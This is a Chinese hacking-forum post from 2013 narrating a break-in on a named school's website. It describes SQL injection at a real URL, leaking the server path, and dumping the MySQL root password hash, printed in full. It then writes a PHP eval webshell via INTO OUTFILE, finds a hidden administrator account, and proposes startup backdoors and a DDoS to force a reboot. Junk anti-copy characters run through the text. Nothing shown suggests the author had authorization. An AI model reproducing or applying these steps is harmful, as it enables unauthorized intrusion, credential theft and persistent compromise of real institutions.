找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2682|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
  K+ X* }) W! k发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!9 t" ~* Y! T- R  K7 Z3 h+ [

9 }. F! m- i6 X' I  F6 x7 ?. i5 D: H4 S

6 e) n: ]/ N0 f常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 0 ?' r, s2 o0 i5 H& o: E
7 O# \1 Y# B5 }$ }
那么想可以直接写入shell ,getshell有几个条件:+ r; _8 }8 m1 t4 \% Y" t( z2 T2 m
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
. ^8 q# ~# Q4 S! [/ ?- a9 S9 A$ j! w; A
试着爆绝对路径:
  {- x# I3 N3 f) [* Z, Z1./phpMyAdmin/index.php?lang[]=1  
/ q5 q/ h# w; ?- s2./phpMyAdmin/phpinfo.php  ! S$ S" M4 q8 a1 d
3./load_file()  
3 o& s+ {/ J4 D3 O6 b+ G- ]4./phpmyadmin/themes/darkblue_orange/layout.inc.php  * C+ R* z9 l7 s  G# n. I: g2 g
5./phpmyadmin/libraries/select_lang.lib.php  
! X; S$ N6 \/ g5 ?( n+ a6./phpmyadmin/libraries/lect_lang.lib.php  " x# }- \1 n' h$ t" Y9 e
7./phpmyadmin/libraries/mcrypt.lib.php   * \& g! E; c7 {& W: y9 _: g
8./phpmyadmin/libraries/export/xls.php  ) w# W+ m2 u7 v, h8 J
1 |, z1 c3 L6 B/ r
均不行...........................' {- L# V# W' v8 I
! c) r; n( |+ A1 p+ S. @
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
' J# d" Q- c1 T/ ~: X% Z# [
( l9 t* o# [! M  l7 D9 }- ^权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
! b4 E: @( g% @7 w9 m" a. P6 J/ h$ A
2 p8 i3 }2 O- N% F默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
' Y2 g; Q: J$ a( ^- l/ A% A3 N- o5 r
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........6 q! ?2 r" x( P, R& }6 k) k4 m
  p$ t) F: v7 V; O' q
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
1 V. b! M* E3 s/ y, i' {& S) E
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini + o* }$ d  W3 X

/ z# U" j9 k) e自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
( d! I" b. }. ]/ z% ]  r9 N" b! [4 t9 _( ?
成功读到root密码:
  L7 B2 I- H$ q! C' C' H7 D( [/ G0 I* {
17---- r(0072)
% [: e( [( X" `; V18---- o(006f)) x' ~) a/ ]  \% a. x
19---- o(006f)$ P$ ?" ~' H$ o! n7 G' K4 t
20---- t(0074)8 P: n& w5 `( i; ?0 e9 s% ?
21---- *(002a)
' H$ t  v5 a" o8 P22---- 8(0038)
5 A3 H- W  B% z4 i23---- 2(0032)- K$ F* U- z9 F6 {2 C; n
24---- E(0045)
4 |/ b% G  z4 u$ T7 ?8 t- i25---- 1(0031)
+ m9 W$ {, I* q0 u# t; q26---- C(0043)
0 q/ j: i1 r! I* |# z27---- 5(0035)+ f$ W* R: b+ n3 j( r5 H
28---- 8(0038)! G/ i6 M/ g3 ~4 O" f6 K: D7 s2 q
29---- 2(0032)
( x+ ]. a; h3 M& u  O$ y  j1 _30---- 8(0038)! ?. U" d" q$ i4 b3 h
31---- A(0041)
* t; N5 z% K4 ?" x32---- 9(0039)/ x8 J) g2 Z% ^9 M8 B+ j% b$ w
33---- B(0042)
( U6 `( p, S! e" I% f34---- 5(0035)
/ ^: H' R, O1 J/ ~2 b35---- 4(0034)
) y3 G* Q" N$ u7 w1 u2 N36---- 8(0038)! Z, ]& r0 J) ~
37---- 6(0036)
1 I+ Q0 U7 e4 Y5 r; I# `38---- 4(0034)
' p5 y9 {% O4 _2 c) R) p) \  N39---- 9(0039)6 }) X0 I7 Z7 A) @
40---- 1(0031)
- \" G. D, E6 i# N( E* i3 q% s41---- 1(0031)
. @9 ?( W- }# n$ m; D+ P0 P# ~# w42---- 5(0035)
, k' d9 D- o+ x- `$ m2 {43---- 3(0033)
' `6 A) C8 S) k) \5 S. u44---- 5(0035)6 k- f3 ]9 L, O
45---- 9(0039)
+ u6 _- g, J# e1 K" N46---- 8(0038)/ d4 Q0 ~7 T: q! o1 ~
47---- F(0046)" ~" ]6 w& b$ Q# a/ U9 |
48---- F(0046), Y- B& M8 M/ Y/ i+ k4 O$ w! R
49---- 4(0034)
7 e+ X' \% I* Y* H50---- F(0046)
+ B! w8 W/ j7 f- ^51---- 0(0030)# O2 d+ [+ M' O% y0 B& s5 i
52---- 3(0033)
; b6 D0 p8 |( S; u. ]9 c8 `53---- 2(0032)
/ N2 N  x2 D. D& U' M0 h# `54---- A(0041)
1 U- b! T& |( C4 k" O! L55---- 4(0034)
9 N3 B% E3 R8 |: x$ G7 ~56---- A(0041)
" Q& [! j1 J! y% T% q57---- B(0042)0 [- |1 J1 O+ v6 K) Z, N
58---- *(0044)
' x! K. O+ t- Z  S3 u) L59---- *(0035)) T+ [! H- {" ?! A* R
60---- *(0041)* V4 y# h. d( w9 @7 o" C
61---- *0032)/ Q3 p9 l1 L4 N3 p

) Z0 X6 Z* z8 m( q$ d9 x( t" m解密后成功登陆phpmyamin7 Q0 u( ^8 m. _5 S) S: \4 ]) T
                          
5 ~& B3 L, N, {+ j6 s3 q3 D' N. C3 f/ _1 l' Q7 v
                             
& K5 _, k/ \7 _$ j1 k6 q8 p# x9 _. ?' f8 c
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'" e7 J  v( `, m) l' o- w* s, `
) M/ {: E; s3 q  ?
成功执行,拿下shell,菜刀连接:
$ V# T  D+ w! ]  H
6 W3 p& k4 H* K! f服务器不支持asp,aspx,php提权无果...................1 ~# t1 w+ |& E0 I3 V
# e/ r2 N4 }( ]) L2 d% v6 S/ M
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
1 k, s+ b# s$ F0 t. l
服务器上已经有个隐藏帐号了
: r6 i' v2 n# o# b4 X* U! C, c
别名     administrators3 H# G# s6 @. q6 Q
注释     管理员对计算机/域有不受限制的完全访问权

- L" B  v# y1 D# @# R
成员

! ]; V) F9 H: L3 W
-------------------------------------------------------------------------------$ W. C- v6 M. l& ~8 u7 ]# g8 P
admin
% {! I& `* X4 V3 I! l% `) sAdministrator! Z( L2 H+ s9 [. ]
slipper$
: l% {3 ^# q8 ]  |3 ?& o0 Dsqluser
, N& ^. d% W6 N+ ]+ \3 B+ h) A命令成功完成。 / h; L5 h7 b8 I1 x0 J  O
3 p2 u* @: I" k* W: p4 y& a! v
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。8 h5 z' S; L3 O1 }% {: i
9 M# D8 {; y7 Z! x
ddos服务器重启,不然就只能坐等服务器重启了...............................
2 H: q% s; k# m) `
# m7 v! d+ a' x: b" U) X/ `& p  t      
. l9 [% b6 P1 ?4 X6 J& _+ L, T

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表